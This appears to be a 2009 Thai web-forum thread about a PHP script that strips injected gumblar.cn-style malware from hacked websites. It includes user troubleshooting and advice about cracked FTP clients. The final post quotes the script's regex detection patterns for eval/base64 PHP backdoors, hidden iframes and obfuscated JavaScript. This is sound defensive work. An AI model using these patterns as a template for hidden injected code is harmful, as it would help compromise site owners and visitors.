ThaiSEOBoard.com

พัฒนาเว็บไซต์ => Tools => ข้อความที่เริ่มโดย: EThaiZone ที่ 05 พฤษภาคม 2009, 10:24:00

หัวข้อ: [ไม่ทำต่อแล้ว] PHP Virus Remover AJAX v2.S By EThaiZone
เริ่มหัวข้อโดย: EThaiZone ที่ 05 พฤษภาคม 2009, 10:24:00

ไม่ทำต่อแล้วนะครับ ใครจะเอาไปพัฒนาต่อก็เชิญครับ
ด้วยเหตุผลว่าไม่มีเวลา และงานคงค้างยังมาก

ขอโทษด้วยครับ พบกันโปรเจ็คหน้า ถ้าว่าง

โจ้

Detail
เป็นชุดโค้ดที่เขียนขึ้นมาเพื่อรับมือกับปัญหาพวกเว็บที่โดนแทรกโค้ด
ทั้งโดน js php iframe แต่ตอนนี้จะรองรับได้แค่ไม่กี่ตัว

ดังนั้น... ตามนี้ (ขออ้างอิงจากอีกกระทู้ ขี้เกียจพิมพ์ใหม่)

อ้างจาก: EThaiZone ที่ 05 พฤษภาคม 2009, 10:17:43

ตอนนี้เปิดรับไฟล์ที่คิดว่าติดปัญหาโทรจันนะครับ
โดนให้อัพโหลดไฟล์เข้าเว็บอะไรก็ได้ แล้วส่งลิงค์มาให้ผมทาง PM

หรือถ้าใครหาไฟล์ที่เป็นปัญหาไม่เจอ ก็ให้แบ็กอัพทั้งโฟลเดอร์มัน
แล้วส่งมาให้ผมครับ รับรองข้อมูลจะไม่ถูกเปิดเผย ไม่ถูกเอาไปใช้อย่างอื่น
นอกจากทำการหาโค้ดที่เป็นปัญหา ได้เอามาเขียน regex เพื่อจัดการมันออกครับ

Version Update
#   v2.S   -   แก้ Core ชุดใหญ่ และ Optimize Regex (V.2 Stable Version)
#   v2.9   -   แก้ปัญหาเพิ่มเติมตามกระทู้ และ PM แจ้งมา
#   v2.8   -   ตัดการตรวจ css, tpl, txt และ inc
#   v2.7   -   เพิ่มการรองรับโค้ด JS แบบเข้ารหัส
#   v2.6   -   ปรับปรุงโค้ดจัดการ Iframe ใหม่
#   v2.5   -   ปรับปรุงโค้ดจัดการ Iframe ใหม่
#   v2.4   -   แตกไลน์แยกออกเป็น Dreamhost Edition
#   v2.3   -   แก้ระบบการตรวจหาโฟลเดอร์ (ปัญหาจากการใช้บน Dreamhost)
#   v2.2   -   ปรับปรุงการแสดงผลทั้งหมด
#   v2.1   -   ปิด Core ตรวจ (PHP/Backdoor/POST/Eval) gumblar.cn (Click (http://www.thaiseoboard.com/index.php/topic,60804.msg759347.html#msg759347))
#   v2.0   -   ยกระบบเป็น AJAX Single File
#   v1.3   -   ปรับแก้การแสดงผล (บั๊ก)
#   v1.2   -   เพิ่มการรองรับอีก 3 ชนิด
#   v1.1   -   เพิ่มการรองรับอีก 3 ชนิด
#   v1.0   -   เวอร์ชั่นเฉพาะกิจ

Code Download
แบ็กอัพเว็บเก่าก่อนใช้ด้วยนะครับ กันพัง
สคริปนี้ไม่มีผลกับ mysql

For Cpanel/DirectAdmin Hosting (รันที่โดเมนหลักของโฮส มันจะลบโดเมนใกล้เคียงบนระบบให้)
php_virus_remover_ajax.php
(PHP) MD5 Hash : DDCDD5A21153B5FDB4273B0DFD439570

For Dreamhost (รันที่โดเมนไหนก็ได้ มันจะลบโดเมนใกล้เคียงบนระบบให้)
php_virus_remover_ajax_dreamhost_edition.php
(PHP) MD5 Hash : 362718F7EA63B82BDB5E42231AD88648

ืทั้งสองเวอร์ชั่นโหลดที่นี้

โค๊ด:

http://file.upsiwa.com/download.php?file=3263d0ee4ac79e696086086fcdb1df5a

แล้วคลายซิบ จะใช้ตัวไหนก็แล้วแต่ครับ

Type: PHP Script
Encoding: UTF-8

Howto
ใช้ง่ายมากๆ คลาย zip อัพขึ้นโฮส เปิดหน้าเว็บแล้วทำตามหน้าจอ
กดปุ่มครั้งแรกเพื่อตรวจหาไฟลืที่จำเป็นต้องแก้ พอขึ้น FEC: Success!!!
จะมีปุ่มที่สองขึ้นมา ให้กดเพื่อทำการตรวจแก้จริงๆ เมื่อขึ้น FSF: Success!!! แปลว่าเสร็จแล้วครับ

ไม่ต้องตั้งค่าอะไรทั้งสิ้น เขียนให้รองรับทั้งระบบไฟล์ windows และ unix
ใช้เสร็จแล้วควรลบออกนะครับ ไม่งั้นใครมารัน จะเห้นว่าบนโฮสท่านมีไฟล์อะไรบ้างหมดเลยนะครับ
สามารถ rename เป็นชื่ออะไรก็ได้นะครับ ยืดหยุ่นในตรงนี้
ไม่สามารถแอดเป็น cron job ได้นะครับ เพราะทำงานแบบ ajax

เมื่อแก้ปัญหาเสร็จแล้ว

อ้างจาก: manchy ที่ 22 พฤษภาคม 2009, 10:05:26

ผมเพิ่งติดไปหายไม่เกิน 3 วันคับ น่าจะหายแล้ว
ผมติดทุกเว็ปเลย

เมื่อแก้ไวรัสหมดแล้วไป request ให้ google มา review ใหม่คับ

1.submit web ของ google ใหม่
2.request ไปทาง webmaster tools

:)

ขั้นตอนนี้ต้องทำเพื่อปรับสถานะ "ไซต์นี้อาจเป็นอันตรายต่อคอมพิวเตอร์ของคุณ"
แถมเป็นการตรวจด้วยว่าเว็บเรามีปัญหาอะไรหลงเหลืออีกไหม

บทความ
การตรวจสอบ "ไซต์นี้อาจเป็นอันตรายต่อคอมพิวเตอร์ของคุณ" คุณโดนอะไร? (http://www.thaiseoboard.com/index.php/topic,60804.msg760573.html#msg760573)
PHP Virus Remover ทำงานยังไง (http://www.thaiseoboard.com/index.php/topic,60804.msg745508.html#msg745508)
เจอปัญหา Permission denied และ fwrite fclose (http://www.thaiseoboard.com/index.php/topic,60804.msg760688.html#msg760688)

โปรคเช็คการอัพเดตในกระทู้นี้เป็นระยะๆ :P
เกือบลืม โปรดมั่นใจว่าได้มีแบ็กอัพเก็บไว้แล้ว :P

ถ้ามีปัญหาในการใช้ ก็ PM มาคุยได้นะครับ
แต่อาจต้องขอการเข้าถึง FTP ด้วย

:P

อ้างถึง

เกือบลืม เป็นสคริปที่แก้ปัญหาที่ปลายเหตุนะครับ จริงๆ ไม่ควรตั้งชื่อแนวนี้ แต่ไม่รู้จะตั้งอะไร
วิธีแก้ต้นเหตุจริงๆ คือระวังเรื่อง FTP Client ที่ใช้ เพราะหลายคนชอบใช้ของเถื่อน
แล้วพอใช้แล้วโดนไปคน บางโฮสที่ security ต่ำ ก็พาลโดนกันทั้งหมด
ด้วยเหตุแค่ว่าคนแฮกเขาได้ FTP เข้ายิงไฟล์ php มาแล้ว

ดังนั้นโปรดระวัง หันมาใช้ filezilla แทนดีกว่า เพราะของฟรี
หรือถ้าโฮสรับ sftp ก็ใช้แทนซะ (หาบน share host ดูท่าจะยาก)
ไม่งั้นก็อัพไฟล์ผ่าน browser ของตัว CP แทน
เพราะเราอัพผ่าน https ยังดีกว่าทียังมีการเข้ารหัส

เครื่องที่มีปัญหาก็อย่าลืมล้างให้สะอาดด้วย (แนะนำ Eset, Kaspersky, Norton)
พวกนี้เป็นปัญหาใหญ่จริงๆ เพราะมาจากแคร็กของโปรแกรมเถื่อน
เวลา่โหลดอะไรก็ควรระวัง

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: g-ji ที่ 05 พฤษภาคม 2009, 10:28:47

อัพขึ้นโฮส แล้ว รันหน้านั้นได้เลยชิมิ ???

จะมีบ้างมั้ยหว่า :'(

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: payu ที่ 05 พฤษภาคม 2009, 10:33:39

+1 ครับ คุณโจ้

ตอนแรกอยากทำมาแจกเหมือนกัน .. แต่ project ไม่ไปถึงไหน เลยได้แต่คิด
ที่ผมคิดไว้คือ
- script จะ backup ไฟล์ที่กำหนดไว้ทั้งหมด (อาจจะแค่ php, html) ในทุก folder แยกต่างหากไว้ในที่ปลอดภัย แล้วเก็บ md5 หรือ crc ไว้เพื่อตรวจสอบ
- run cron ตามเวลาที่ตั้งไว้ อาจจะทุกวันเพื่อตรวจสอบการเปลี่ยนแปลงของไฟล์
- ถ้าไฟล์ที่ตรวจสอบมี md5 หรือ crc เปลี่ยนไป ก็ให้เอาที่ backup ไว้กลับมาทับโดยอัตโนมัติครับ

เทคนิคนี้มีข้อเสียนิดนึง ถ้าเราแก้ไขไฟล์ จะต้องแน่ใจว่าไม่โดน hack และจะต้อง run script เพื่อ backup ต้นฉบับไว้ทุกครั้ง

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: ต่อ ที่ 05 พฤษภาคม 2009, 10:36:37

สุดๆครับ ถ้าอยู่ใกล้ๆจะพาไปเลี้ยง เอ็มเก คุ๊กกี้ ::)

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: EThaiZone ที่ 05 พฤษภาคม 2009, 10:47:55

อ้างจาก: payu ที่ 05 พฤษภาคม 2009, 10:33:39

น่าสนใจนะครับ เห็นด้วยนเลย จะให้ดีก็ต้องทำลิสไฟล์เก็บทั้ง hashfile ด้วย
และจัดการเข้ารหัสไฟล์ backup ทั้งหมด รวมทั้ง rename เป็นค่า hash อื่น
เพราะเมื่อวา่นผมได้คุยกันสองท่าน ที่เจอปัญหาเรื่องนี้
(ต้องขอบคุณที่ให้ผมเข้า FTP กับ CP ของท่านด้วยนะ)

พฤติกรรมของคนทำ เหมือนกับว่า
เอาพาส ftp จาก ftp client ที่โดนแครก
เพิ่มพาสเข้าระบบมัน แล้วระบบมันจะยิง ftp มาอัพโหลดไฟล์ตามเกณฑ์ที่มันต้องการ
ที่โดนจะพวกไฟล์ที่มีชื่อแนวๆ index main function config
จะมีโดนพิเศษมาหน่อยก็เช่น wp-db ของ WP

แต่ต้องยอมรับจุดหนึ่ง มันเล่นทุกโฟลเดอร์เลย
อันนี้แหละที่เผลอๆ script backup มันจะซวยไปด้วย

ฝากบอกอีกหลายท่าน
วิธีดีสุด คือระวังเรื่องการใช้ของเถื่อน ต้องป้องกันก่อนที่จะเกิด
โค้ดที่ผมเขียนในกระทู้นี้ไว้เป็นแค่เครื่องมือแ้ก ไม่ใช่ป้องกัน
เป็นการแก้ปลายเหตุล้วนๆ

ปล. โปรดแบ็กอัพไฟล์ก่อนใช้ :P (ลืมบอก)

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: SearchMarketing ที่ 05 พฤษภาคม 2009, 10:51:54

ที่แท้ก้อเข้าทาง ftp นี่เอง ความรู้ใหม่ขอบคุณครับ

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: sir_15 ที่ 05 พฤษภาคม 2009, 10:55:39

+1 มันลบปื๊ดเดียวเองจ่ะง่ายมากเลย

แต่มันติดอันอื่นๆอีกน่ะน้องโจ้ อันเก่าไป อันใหม่มา(ที่จิงอันเดิมแต่เราหาไม่เจอ) :-X

อ้างถึง

มีหลายๆคนเจอนะคะ ตรวจเว็บของท่านดีๆว่ามีการแก้ไขผิดปกติไหม ของกิวแก้ทั้งโฮสเลยทุกโดเมน ห่างกันประมาณ 30 วินาที ลองตรวจๆกันดูนะคะ

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: ball6847 ที่ 05 พฤษภาคม 2009, 10:56:57

ถ้าไฟล์แบ็คอัพไว้เป็น zip จะโดนป่ะ ???

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: TAXZe ที่ 05 พฤษภาคม 2009, 11:05:01

อ้างจาก: ball6847 ที่ 05 พฤษภาคม 2009, 10:56:57

ถ้าไฟล์แบ็คอัพไว้เป็น zip จะโดนป่ะ ???

zip+pass ด้วย

antivirus ยังทำอะไรไม่ได้เลย ;D

ไวรัสตัวนี้ปีก่อนๆก็มี เกิดจาก ftp โดนดักพาส

filezilla ยังโดนเลย

:P

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: EThaiZone ที่ 05 พฤษภาคม 2009, 11:06:31

อ้างจาก: sir_15 ที่ 05 พฤษภาคม 2009, 10:55:39

อ้างถึง

ตามนั้นเลย gumblar.cn มันเล่นหลายเวอร์ชั่นมากๆ
ตอนนี้เขียนเพิ่มไปอัีกแล้วครับ พยายามเขียนให้รัดกุม ยืดหยุนนิดๆ
เพราะถ้ายืดหยุนมากเกินไป กลัวแม้แต่มันอ่าน jquery แล้วจะเข้าใจว่าเป็นอันตราย
ดังนั้นโค้ดนี้อาจกิน cpu นิดส์ๆ ตามจำนวนไฟล์

อ้างจาก: ball6847 ที่ 05 พฤษภาคม 2009, 10:56:57

ถ้าไฟล์แบ็คอัพไว้เป็น zip จะโดนป่ะ ???

ไม่โดนครับ คิดว่างั้น

-----------------------------

กรณีบนโฮสคุณ sir_15 เจอเหตุการณ์ดังนี้
- แทรกโค้ด php ลงส่วนหัวสุด ของไฟล์ php
- แทรกโค้ด js ลงท้ายสุด ของไฟล์ js
- สร้างไฟล์ image.php บนโฟลเดอร์ image

ซึ่งท้ายสุดนี้เป็น backdoor

-----------------------------

เออใช่ เดียวอาจออกเป็นเวอร์ชั่น dreamhost เพราะเห็นมันโดนทุกโฟลเดอร์ในนั้น
ระบบโฟลเดอร์ต่างจากโฮสที่ช้ cpanel ทั่วไป

เดี๋ยวดูอีกทีหนึ่ง :P

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: g-ji ที่ 05 พฤษภาคม 2009, 11:08:42

สรุปคนเขียนมันเทพใช่มั้ยเนี้ย :P

ขอบคุณ คุณโจ้มากๆ :-[

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: EThaiZone ที่ 05 พฤษภาคม 2009, 11:09:59

อ้างจาก: TAXZe ที่ 05 พฤษภาคม 2009, 11:05:01

อ้างจาก: ball6847 ที่ 05 พฤษภาคม 2009, 10:56:57

ถ้าไฟล์แบ็คอัพไว้เป็น zip จะโดนป่ะ ???

พวก sniffer เหรอครับ

อันนี้ต้องยอมรับเลย sniffer ดักพา่ส ftp ได้
แต่มันจะโดนกันน้อย ถ้าใช้พวก eset หรือ kaspersky

จริงอยู่ว่า avast กับ avg พวกนี้จะตรวจปัญหาบนหน้าเว็บเจอ
แต่จริงๆ มันไม่ใช่ตัวโทรจันจริงๆ เพราะมันไม่ได้มีการโหลดแพ็กเกจอันตรายเพิ่มเติม

ที่กลับกัน แม้พวก eset หรือ kaspersky จะไม่เจอพวกนี้
จริงๆ ที่ไม่เจอก็เพราะมันไม่จัดว่ามันอันตรายแก่ผู้ใช้ (แต่อันตรายกับเจ้าของเว็บ เพราะเสียทราฟิคให้)

ดังนั้นต้องกลับมามองครับ จริงอยู่ หลายคนว่า avast กับ avg มันตรวจเจอ
แต่คนที่ใช้ก็ยังโดนไอ้พวกนี้ใช่ปะครับ

ส่วนผมไม่เคยใช้ avast กับ avg ใช้แต่ eset แต่ไม่เคยโดนไอ้พวกนี้เลย

ตรงนี้น่าคิดไหมครับ ;)

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: ndesigns ที่ 05 พฤษภาคม 2009, 11:11:00

ขอบคุณคับโจ้ ผมโดน .cn เล่นงานอีกแล้ว

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: EThaiZone ที่ 05 พฤษภาคม 2009, 11:14:00

อ้างจาก: ndesigns ที่ 05 พฤษภาคม 2009, 11:11:00

ขอบคุณคับโจ้ ผมโดน .cn เล่นงานอีกแล้ว

ถ้าโดนอะไร ก็ส่งไฟล์เจ้าปัญหาเข้ามาทาง pm ครับ
เพราะผมจะได้มาเขียน ไว้เผื่อคนอื่นโดน มันจะได้ช่วยลบได้ และลบง่ายขึ้น

แต่ถ้าหาไม่เจอ หรือไม่ชัวร์ กลัวหาไม่หมด
แบ็กอัพมาทั้งโฟลเดอร์แล้วส่งมาให้ผมเลย รับรองข้อมูลไม่รั่ว
เพราะถ้าคิดชั่ว มันเสียชื่อ EThaiZone พอดี

อยากจะอยู่กันนานๆ รอ TSB อายุครบ 10 ปี อะไรแบบนั้น :P

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: peglui ที่ 05 พฤษภาคม 2009, 11:16:01

ว้าว ๆ ขอบคุณคร้าบบบ พี่เก่งมาก ๆ อะ >_< แบบว่่าขอติดตาม กับเอาความรู้ไปใช้มาหลายกระทู้

ขอให้หายยุ่งไว ๆ นะคร้าบ แล้วจะรอพี่มาเขียนบทความให้อ่านอีก

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: GoooooooooGle ที่ 05 พฤษภาคม 2009, 11:16:43

โอ้วพระเจ้าจอร์ด มันยอดมาก

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: EThaiZone ที่ 05 พฤษภาคม 2009, 11:21:25

เดียวเปิด donate จะได้เข้าทำนองของฟรีไม่มีในโลก :D

แนะนำให้เลี่ยงเลยนะครับ พวกโปรแกรมเถื่อนแนวแครก
ไม่ใช่แต่กับเฉพาะ FTP Client อย่าง Cuteftp
เชื่อไหม ทั้งคุณ sir_15 และอีกท่าน (ลูกค้าเก่าผม) ทั้งคู่ใช่ Cuteftp อย่างไม่น่าเชื่อ

คุณ sir_15 โดน gumblar.cn เล่น
ส่วนอีกคนโดน iframe เล่นแทรกหลังโ้ค้ด
มันดันไปแทรก ในโค้ด xml music streaming ที่ผมเคยเขียนให้ลูกค้า
มันเลยฟังเพลงไม่ออกซะงั้น :-X

ก็ตามนั้นเลย จริงๆ โปรแกรมแคร็กตัวอื่นก็มีครับ
แนะนำให้ใช้พวก eset หรือ kaspersky เลย

เพราะผมเคยแม้แต่โหลดจากลาปเป็ด ระหว่างโหลดก็โดน eset ตัด network ทิ้งซะงั้น
แล้วมันก็บอกไฟล์จากลาปเป็ดอันตราย โหลดอีกกี่รอบมันก็ตัดทุกรอบทั้งที่ยังโหลดไม่เสร็จ

อุๆ ของเขาดีจริงๆ ::)

และ ของฟรีไม่มีในโลก (ยกเว้นโฮสฟรีของไทยเสียว อันนี้ฟรีจริงๆ)

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: GoooooooooGle ที่ 05 พฤษภาคม 2009, 11:36:03

อ้างจาก: EThaiZone ที่ 05 พฤษภาคม 2009, 11:21:25

เปิดเว็บให้ดาวโหลดจริงจังเลยครับ
ส่งไปให้ไทยแวเผยแพร่ รับรองรวย

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: TAXZe ที่ 05 พฤษภาคม 2009, 11:36:42

อ้างจาก: EThaiZone ที่ 05 พฤษภาคม 2009, 11:09:59

อ้างจาก: TAXZe ที่ 05 พฤษภาคม 2009, 11:05:01

อ้างจาก: ball6847 ที่ 05 พฤษภาคม 2009, 10:56:57

ถ้าไฟล์แบ็คอัพไว้เป็น zip จะโดนป่ะ ???

nod32 ดักได้ครับ ยืนยันอีกเสียง

แต่อยากใช้ norton 2009

เขาว่าเทพสุดแล้วในขณะนี้

:o

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: EThaiZone ที่ 05 พฤษภาคม 2009, 11:46:35

หวังว่า norton จะดีกว่าช่วงปีสองปีที่แล้ว
ช่วงนั้นมันอืดจริงๆ หมายถึงความสามารถมันอะ
ยังกะนักวิจัยเขานกเขาไม่ขัน เลยโดนพวก kas eset ชิงไปซะงั้น

ตอนนี้คุณ sir_15 ช่วยเป็นหนูทดลองเวอร์ชั่นบน dreamhost
เมื่อคืนถึงตีสองกว่าๆ ได้มั้ง นั่งช่วยเป็นหนูทดลอง

บอกตามตรงตอนแรกไม่กล้าแจก เพราะกลัวคนใช้มีปัญหาแล้วเราจะซวย
เลยพยายามเอา % ที่อาจเกิดความผิดพลาด ไปลงที่การทำงานของระบบแทน
คือโค้ดจะทำงานหนักกว่าหน่อย แต่ % การผิดพลาดจะลดลง

:P

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: sir_15 ที่ 05 พฤษภาคม 2009, 11:57:02

ตอนนี้Hostgator ปลอดภัยแล้วนะคะ ของเค้าดีจริงๆ :'(

เหลือดรีมโหด ต้องรอดูอาการต่อไป

อ้างถึง

เดียวเปิด donate จะได้เข้าทำนองของฟรีไม่มีในโลก :D

เปิดเลยจ่ะโจ้เห็นด้วยนะ แค่นี้พี่ก็เกรงใจจะแย่ :)

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: EThaiZone ที่ 05 พฤษภาคม 2009, 12:38:56

ของ dreamhost แค่แก้เรื่อง path ให้ย้อนหลังมา 1 ชั้นเอง
นอกนั้นเหมือนกันหมด

แต่ว่าปัญหาอยู่ที่จำนวนไฟล์ อย่างของคุณ sir_15 นี้
มีตั้ง 100 กว่าโดเมน

ซึ่งแบบว่า php มันจัดการไม่ค่อยจะไหว เลยกำลังนึกอาจต้องทำเป็น ajax เต็มๆ
เดี๋ยวต้องดูกันอีกที :P

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: tinnoi ที่ 05 พฤษภาคม 2009, 12:56:00

ขอบคุณมากครับ ขอรับไปลอง แล้วจะมีเอี่ยวด้วยครับ เจอบ่อยครับ ของผม

หัวข้อ: Re: PHP Virus Remover By EThaiZone
เริ่มหัวข้อโดย: sir_15 ที่ 05 พฤษภาคม 2009, 13:37:41

อ้างจาก: EThaiZone ที่ 05 พฤษภาคม 2009, 11:21:25

แนะนำให้เลี่ยงเลยนะครับ พวกโปรแกรมเถื่อนแนวแครก
ไม่ใช่แต่กับเฉพาะ FTP Client อย่าง Cuteftp
เชื่อไหม ทั้งคุณ sir_15 และอีกท่าน (ลูกค้าเก่าผม) ทั้งคู่ใช่ Cuteftp อย่างไม่น่าเชื่อ

ลืมบอกไปค่ะ Cuteftp ของกิวโหลดจากในบอร์ดนี่แหละ :D

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: ball6847 ที่ 05 พฤษภาคม 2009, 13:48:23

อ้างจาก: EThaiZone ที่ 05 พฤษภาคม 2009, 12:38:56

เพราะงี้แหละ ผมเลยเอาของคุณ mean มาโมใส่ ajax ;D

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็ก&#
เริ่มหัวข้อโดย: sir_15 ที่ 05 พฤษภาคม 2009, 14:09:12

ลองดรีมโฮสมาแล้วนะคะ อีกโฮสนึงมานมีโดเมนไม่มาก ไม่ถึง 100 เลย ประมาณ 50-60 โดเมน

(http://images.temppic.com/05-05-2009/images_vertis/1241507044_0.18988000.jpg)

(http://images.temppic.com/05-05-2009/images_vertis/1241507044_0.92747000.jpg)

ลบได้สบายมากจ่ะ แต่ดรีมโฮส1 ที่มัน 168 โดเมนนี่ยังคงค้างอยู่ที่เดิม *--*

ใครที่มีโดเมนในดรีมโฮสไม่เยอะนำไปใช้ได้แล้วนะคะ ไม่มีปัญหา ผลงานคุณภาพ By EThaizone :)

ปล.แอบประชาสัมพันธ์ให้ด้วย อิอิ

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: g-ji ที่ 05 พฤษภาคม 2009, 14:19:21

มันขึ้นแบบนี้อ่า

โค๊ด:

Warning: Invalid argument supplied for foreach() in /home/xxxdomains/g-ji.com/public_html/php_virus_remover.php on line 80

Warning: Invalid argument supplied for foreach() in /home/xxx/domains/g-ji.com/public_html/php_virus_remover.php on line 94

Warning: Invalid argument supplied for foreach() in /home/xxx/domains/g-ji.com/public_html/php_virus_remover.php on line 94

ขึ้นอยู่ 3 บรรทัีดนี้ ยาวเป็นหางว่าวเลย :'(

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: inDexTop10 ที่ 05 พฤษภาคม 2009, 14:41:21

ขอบคุณมากเด้อ

สำหรับสิ่งดีๆ

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: mikeyx ที่ 05 พฤษภาคม 2009, 15:00:04

Warning: Invalid argument supplied for foreach() in /home/xxx/domains/xxx.com/public_html/virus-scan.php on line 77

error เยอะเลยครับจนถึง line 91

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: g-ji ที่ 05 พฤษภาคม 2009, 15:10:48

อ้างจาก: mikeyx ที่ 05 พฤษภาคม 2009, 15:00:04

Warning: Invalid argument supplied for foreach() in /home/xxx/domains/xxx.com/public_html/virus-scan.php on line 77

error เยอะเลยครับจนถึง line 91

ดูแล้วโครงสร้างเดียวกัน

ออใช่

ของเรามันบอกว่า file *.js มีปัญหา -*- ลองโหลดมาเปิดดูก็ไม่มีอะไรง่ะ

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: 7 ที่ 05 พฤษภาคม 2009, 16:17:48

เอาเข้า sourceforce ไปเลยดิ จะได้เป็นเรื่องเป็นราว ให้คนเข้ามา submit signature เหมือนโปรแกรม antivirus

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: EThaiZone ที่ 05 พฤษภาคม 2009, 21:47:53

อ้างจาก: 7 ที่ 05 พฤษภาคม 2009, 16:17:48

เรื่องคือภาษาปะกิดไม่คล่อง ไม่รู้จะเขียนอธิบายยังไง
กลัวไปขายขี้หน้า ;D

ตอนนี้ขอกลับไปไล่โค้ดดูก่อน เห็นว่าเจอ error
เพราะเท่านี้เทสก็ยังไม่เจอ :P

เออ นึกขึ้่นได้ อาจเพราะใ้ช glob ไม่ได้หรือเปล่าว้า :P

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: g-ji ที่ 05 พฤษภาคม 2009, 21:52:18

ของเรามัน error บรรทัดนี้อ่ะ

โค๊ด:

foreach($file as $node)

glob นั้นหมายถึง global หรือเปล่า ถ้าใช่ โฮสเราใช้ได้นะ :P (สคริปหน้าอ่านการ์ตูนใหม่ก็ใช้ เหอๆ)

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: SearchMarketing ที่ 05 พฤษภาคม 2009, 22:10:58

มันคืออะไร มันทำอะไรหรอครับ

แล้วมันไปลบไวรัสได้ไง

ผมเจอ 10 ตัวแนะ clean ไปแล้ว แต่อ่านโค้ดไม่ออก อยากรู้ว่าทำอะไรลงไป กลัวเว็บเน่าอะคับ
:'( :'(

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: g-ji ที่ 05 พฤษภาคม 2009, 22:14:46

อ้างจาก: SearchMarketing ที่ 05 พฤษภาคม 2009, 22:10:58

สคริปนี้มันจะ หา สคริปท์ที่เป็นไวรัส หรือ เข้าข่ายที่จะเป็นไวรัส (ดูจากโค้ดที่เขียน)

แล้วจะลบโค้ดออก แทนที่ด้วย พื้นที่ว่างๆ แทน

หัวข้อ: Re: PHP Virus Remover By EThaiZone (ปัญหาบนเว็บจะกลายเป็นเรื่องเด็กๆ)
เริ่มหัวข้อโดย: EThaiZone ที่ 05 พฤษภาคม 2009, 22:21:19

อ้างจาก: g-ji ที่ 05 พฤษภาคม 2009, 21:52:18

ของเรามัน error บรรทัดนี้อ่ะ

โค๊ด:

foreach($file as $node)

glob จริงๆ ครับ เป็นฟัีงค์ชั่นสารพัดประโยชน์
http://www.thaiseoboard.com/index.php/topic,6920.msg241386.html#msg241386

อ้างจาก: SearchMarketing ที่ 05 พฤษภาคม 2009, 22:10:58

อืม งั้นผมแจงให้สำหรับคนที่ไม่รู้เรื่องโค้ดละกัน ขั้นแรกเปิดในไฟล์ นะครับ จะเช่นช่วงนี้

โค๊ด:

## Virus Pattern (ห้ามแก้เด็ดขาด)
$virus_core = array(
	"#(<\?.*?function_exists.*?fromCharCode.*?document\.write.*?</title>.*?gzencode.*?set_error_handler.*?\?>)#i",	 // (PHP/ScriptEngine/RSS) gumblar.cn
	"#(<\?(php)?[^a-z0-9]*?eval\(base64_decode\(.*?'\)\);[^a-z0-9]*?\?>)#is",	// (PHP/Backdoor/POST/Eval) gumblar.cn
	"#<iframe.*?visibility: ?hidden.*?></iframe>#i",	// (PHP/IFrame/Hidden) litecarexcellent.cn
	"#\(function\(\)\{var.*?replace.*?eval\(unescape.*?\}\)\(\);#i",	// (JS/ScriptEngine/RSS) gumblar.cn
	"#\(function\([a-z0-9]*\)\{var.*?(replace|eval|unescape).*?\}\)\([^\)]*\);#i",	// (JS/ScriptEngine/RSS) gumblar.cn
	"#\(function\([a-z0-9]*\)\{eval\(unescape.*?replace.*?\}\)\([^\)]*\);#i",	// (JS/ScriptEngine/RSS) gumblar.cn
);

มันเป็น Regex (Regular Expression) ที่ใช้แยกโค้ดที่เป็นไวรัสออกจากโค้ดปกติในไฟล์
นึกภาพ อย่าง บรรทัดนี้
